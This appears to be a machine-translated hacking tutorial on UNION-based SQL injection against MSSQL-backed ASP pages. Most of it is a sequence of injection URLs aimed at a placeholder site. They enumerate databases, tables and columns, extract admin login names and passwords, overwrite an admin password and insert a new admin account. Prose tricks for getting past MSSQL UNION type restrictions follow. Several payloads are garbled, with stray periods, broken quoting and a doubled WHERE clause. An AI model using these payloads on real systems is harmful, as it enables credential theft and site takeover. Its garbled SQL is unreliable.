MSSQL uses union to query burst data

Database explosion: http://duck/index.asp.id=10 Union select top 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA. -- select top 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA. Blast the next database: http://duck/index.asp.id=10 Union select top 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE TABLE_NAME not in ('database name') -- burst table: http://duck/index.asp.id=10 Union select top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES -- select top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES. http://duck/index.asp.id=10 Union select top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME not in ('table1 ')-- http://duck/index.asp.id=10 Union select top 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '% login %' -- burst field: http://duck/index.asp.id=10 Union select top 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'admin _ login' -- blow the next field http://duck/index.asp.id=10 Union select top 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'admin _ login' WHERE COLUMN_NAME not in ('login _ id ')-- http://duck/index.asp.id=10 Union select top 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'admin _ login' WHERE COLUMN_NAME not in ('login _ id', 'login _ name', 'Password', details ') -- content in the burst Field http://duck/index.asp.id=10 Union select top 1 login_name FROM admin_login -- http://duck/index.asp.id=10 Union select top 1 password FROM admin_login where login_name = 'neo '-- http://duck/index.asp.id=10 Union select top 1 password FROM admin_login where login_name = 'delimiterity '-- http://duck/index.asp.id=10 Union select top 1 convert (int, password. morpheus.) FROM admin_login where login_name = 'delimiterity '-- Update the content in the field http://duck/index.asp.id=10 ; UPDATE. admin_login. SET. password. =. newpas5. WHERE login_name = 'neo '-- http://duck/index.asp.id=10 ; Insert. admin_login. (. login_id .,. login_name .,. password .,. details .) VALUES (666 ,. neo2 .,. newpas5 .,. NA .) -- during injection, in the access and mysql environments, we usually obtain data through union. However, in the mssql environment, union often does not work. If the page does not report an error and openrowset is unavailable, it is often only violent. How can we use this brutal means? After research, the union selection in mssql mainly has the following restrictions. The first one is that the union of varchar/nvarchar and int fields will force conversion errors. Here we can go to the article about superhei Daniel N long ago and use and 1 = 2 to leave the result set before union empty. The second is that when the fields selected by the current statement are in the text, ntext, or image format, the DISTINCT method cannot be used for selection, and the union statement must be selected in the DISTINCT method. This is also why many injection points of the search type can be guessed by union, because the statement of the search point rarely selects the fields in the first three formats. The Image is in binary format and will not appear in the SQL statement that requires echo. Some time ago, we also saw that Niuke provided a solution. The union was followed by an all, that is, union all. It's amazing. Cow is cow. The last restriction is that the union of text/ntext and int fields is not compatible, and an error indicating an operation type conflict is reported, even if 1 = 2 is used, the result of the preceding union statement is set to null. A few days ago, we suddenly thought that we often use, 3 ...... And so on. At this time, all the subsequent statements are int fields. Of course, an error will occur when the text or ntext fields are in front. If quotation marks are added, that is, '1', '2 ', '3 '......? At this time, the following fields are of the char or varchar type, so there should be no errors. What if quotation marks are filtered out at the injection point? Because mssql does not support the hexadecimal format very well, in many places, the hexadecimal format must be declare-set, so use char, that is, and 1 = 2 union all select char (49), char (50 )....... Most of the restricted statements and 1 = 2 union all select char (49), char (50), null, null; -- null can also be executed normally, but no echo, it is difficult to judge the number of ECHO columns. Generally, union has problems with text or ntext fields. If an image is rarely used, it can be null first and then replaced by 1, 2, 3, and 4, respectively. In this way, an image-type column bird can be forced out.